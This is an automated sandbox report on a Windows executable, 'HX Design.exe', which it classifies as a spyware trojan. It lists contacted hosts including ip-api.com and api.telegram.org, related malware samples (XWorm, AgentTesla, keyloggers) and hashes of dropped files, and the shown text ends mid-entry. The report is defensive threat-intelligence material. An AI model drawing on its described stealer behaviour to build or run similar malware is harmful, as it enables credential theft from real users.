                                                                                                                                                                                                                              http://www.quovadisglobal.com/cps0HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                208.95.112.1
                                                                                                                                                                                                                                ip-api.comUnited States
                                                                                                                                                                                                                                53334TUT-ASUSfalse
                                                                                                                                                                                                                                149.154.167.220
                                                                                                                                                                                                                                api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                                62041TELEGRAMRUfalse
                                                                                                                                                                                                                                142.250.181.132
                                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                127.0.0.1
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1579227
                                                                                                                                                                                                                                Start date and time:2024-12-21 05:56:09 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 13m 6s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:93
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:HX Design.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.adwa.spyw.expl.evad.winEXE@153/109@5/4
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 60%
                                                                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.168.117.173, 142.250.181.99, 184.30.17.174, 172.202.163.200, 4.245.163.56, 13.107.246.63
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, gstatic.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 2816 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7704 because it is empty
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                23:57:06API Interceptor7x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                                23:57:09API Interceptor83x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                23:57:20API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                208.95.112.1dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                149.154.167.220file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                                                                                                                                                                                                  2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                    Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                      c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                  66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    ip-api.comdF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    bg.microsoft.map.fastly.net1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                                    1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                    • 199.232.214.172
                                                                                                                                                                                                                                                    Statements.pdfGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                                    INVOICE_2279_from_RealEyes Digital LLC (1).pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 199.232.214.172
                                                                                                                                                                                                                                                    Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                                    BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 199.232.214.172
                                                                                                                                                                                                                                                    MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                                    SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 199.232.214.172
                                                                                                                                                                                                                                                    tmp.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                                                    • 199.232.210.172
                                                                                                                                                                                                                                                    api.telegram.org2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    TELEGRAMRUfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznjGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    TUT-ASUSfile.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                                                                                                    Entropy (8bit):1.3073555446953609
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvre:KooCEYhgYEL0In
                                                                                                                                                                                                                                                    MD5:7F4295A05B08BBD9826ED19630197598
                                                                                                                                                                                                                                                    SHA1:FBEAA42F4BC80705F88AFD17848B1D3877CA26F2
                                                                                                                                                                                                                                                    SHA-256:4AEB775C800753F300CE65132BD5DE82A9B7FF5D3A32FA7DBA8015F33BB3D2BC
                                                                                                                                                                                                                                                    SHA-512:3794C653610CC71CD03D6C1E9D7741206C0C21E61AFFB68C1D9A4EFA2C95373EC90FFC64F9FCB34A65F9DEA211ACF965D7395FECFB45CB4D2E98B38284EE726A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe78fdf00, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                                                                                                    Entropy (8bit):0.42210112512517145
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                                                                                                                                                                                                                                                    MD5:AFCB4552DBFF35A87C5C399E26B009C5
                                                                                                                                                                                                                                                    SHA1:A0D19B6B18126E1CBDB9F2C61BBFA0F564F5C81E
                                                                                                                                                                                                                                                    SHA-256:B7FF8CC6F410A404423774EAAE3799BB5F79E0183C1D2929D6AC738784EC60FD
                                                                                                                                                                                                                                                    SHA-512:7ABFF20C57D273E34AC1AF356A90AFB04A3677FA8CC9CEAD1B53370B4CE949F26A6D206EA05D8DABDB15F1C3BEF7D2505E233937E6B2D153329F7B41BB178BFB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:...... .......A.......X\...;...{......................0.!..........{A..9...|7.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................hH)..9...|W..................8..9...|7..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                                                                                                    Entropy (8bit):0.07535261679757696
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:5ilEYeH1Tjn13a/U0gchXallcVO/lnlZMxZNQl:5dzH1T53qU0gQeOewk
                                                                                                                                                                                                                                                    MD5:2DD687215134497B2BB261ED410DBDD2
                                                                                                                                                                                                                                                    SHA1:1B5252C6B070C7DB1B828A85A7C3469782E4A9C3
                                                                                                                                                                                                                                                    SHA-256:4C9285B2D16EB6084482AE033AA591DDF46CC21BBB84A1588265BCEC49625B6E
                                                                                                                                                                                                                                                    SHA-512:C2726FA05950F70B7049A18802D777258AA1607131784F59A7114000162F9A469AC23D9DC0C320EF3ED447EAD749999B081E33EB364433178764F1F430FA895B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:.{_......................................;...{...9...|7......{A..............{A......{A..........{A].................8..9...|7.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                    Entropy (8bit):0.7403664744478247
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:FiWXlv9U:Lv
                                                                                                                                                                                                                                                    MD5:99BBE027A67D5B8E84C910F7C77709D2
                                                                                                                                                                                                                                                    SHA1:372EFA7431F8EECFC4247C810131CB6928E50AC3
                                                                                                                                                                                                                                                    SHA-256:0F27051CF1DA3BBA983425A45ED2DE291E43491E0A982844D92C5B92AF34FCAE
                                                                                                                                                                                                                                                    SHA-512:E3970DEFF941FE95016F731651C7C234FF4AD27B54317BE44B4292F050E2A4B9ACACFF103837ADFC94999F9B534098231204C26D9BBDF47412CFE09C50F77BE7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:sdPC......................5.y&.K.?....................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                    Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                                                                                    Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                                                                                    Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                                                                                    Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):262512
                                                                                                                                                                                                                                                    Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:LsNl7Ul:Ls3Y
                                                                                                                                                                                                                                                    MD5:B10161CBAC10E67E6B55C67D23CADA62
